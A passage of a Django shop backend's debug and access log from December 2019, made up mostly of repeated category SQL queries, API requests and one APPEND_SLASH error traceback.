"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 08:09:04,564 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 08:09:04] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 08:10:06] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 08:12:14,227 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 08:12:14,238 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 08:12:14,241 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 08:12:14,245 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 08:12:14,249 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 08:12:14,252 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 08:12:14,254 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 08:12:14,256 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 08:12:14,258 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 08:12:14,261 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 08:12:14,263 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 08:12:14] "GET /api/v1/categories/ HTTP/1.0" 200 1619 [09/Dec/2019 08:15:09] "GET / HTTP/1.0" 302 0 [09/Dec/2019 08:20:11] "GET / HTTP/1.0" 302 0 [09/Dec/2019 08:25:14] "GET / HTTP/1.0" 302 0 [09/Dec/2019 08:30:16] "GET / HTTP/1.0" 302 0 Not Found: /error.log-20191126.gz [09/Dec/2019 08:34:33] "GET /error.log-20191126.gz HTTP/1.0" 404 6657 [09/Dec/2019 08:35:19] "GET / HTTP/1.0" 302 0 [09/Dec/2019 08:40:21] "GET / HTTP/1.0" 302 0 [09/Dec/2019 08:48:20] "GET / HTTP/1.0" 302 0 [09/Dec/2019 08:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [09/Dec/2019 08:57:48] "GET / HTTP/1.0" 302 0 [09/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [09/Dec/2019 09:13:52] "GET / HTTP/1.0" 302 0 [09/Dec/2019 09:18:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 09:19:32,808 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'resfx'; args=('resfx',) Not Found: /resfx/ [09/Dec/2019 09:19:32] "GET /resfx/ HTTP/1.0" 404 1727 [09/Dec/2019 09:23:57] "GET / HTTP/1.0" 302 0 Internal Server Error: /editBlackAndWhiteList Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/utils/deprecation.py", line 93, in __call__ response = self.process_request(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 53, in process_request path = self.get_full_path_with_slash(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/middleware/common.py", line 93, in get_full_path_with_slash 'url': request.get_host() + new_path, RuntimeError: You called this URL via POST, but the URL doesn't end in a slash and you have APPEND_SLASH set. Django can't redirect to the slash URL while maintaining POST data. Change your form to point to 193.255.212.103/editBlackAndWhiteList/ (note the trailing slash), or set APPEND_SLASH=False in your Django settings. [09/Dec/2019 09:25:32] "POST /editBlackAndWhiteList HTTP/1.0" 500 63841 [09/Dec/2019 09:28:59] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-09 09:29:59,081 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:29:59,088 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:29:59,092 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:29:59,096 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:29:59,099 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:29:59,102 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:29:59,104 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:29:59,107 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:29:59,109 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:29:59,112 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:29:59,114 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:29:59] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 09:30:25,898 utils 32196 139885050582784 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:30:25,903 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:30:25,905 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:30:25,908 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:30:25,910 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:30:25,912 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:30:25,914 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:30:25,916 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:30:25,919 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:30:25,921 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:30:25,923 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:30:25] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 09:31:56,498 utils 32196 139885050582784 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:31:56,506 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:31:56,511 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:31:56,515 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:31:56,519 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:31:56,523 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:31:56,527 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:31:56,532 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:31:56,536 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:31:56,541 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:31:56,545 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:31:56] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 09:32:13,319 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:32:13,324 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:32:13,327 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:32:13,330 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:32:13,332 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:32:13,334 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:32:13,337 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:32:13,341 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-09 09:32:13,343 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-09 09:32:13,345 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-09 09:32:13,348 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [09/Dec/2019 09:32:13] "GET /api/v1/categories/ HTTP/1.0" 200 1619 DEBUG 2019-12-09 09:32:30,821 utils 32196 139885050582784 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-09 09:32:30,826 utils 32196 139885050582784 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-09 09:32:30,829 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-09 09:32:30,831 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-09 09:32:30,834 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-09 09:32:30,836 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-09 09:32:30,838 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-09 09:32:30,841 utils 32196 139885050582784 (0.000) SELECT "shop_category"."id", 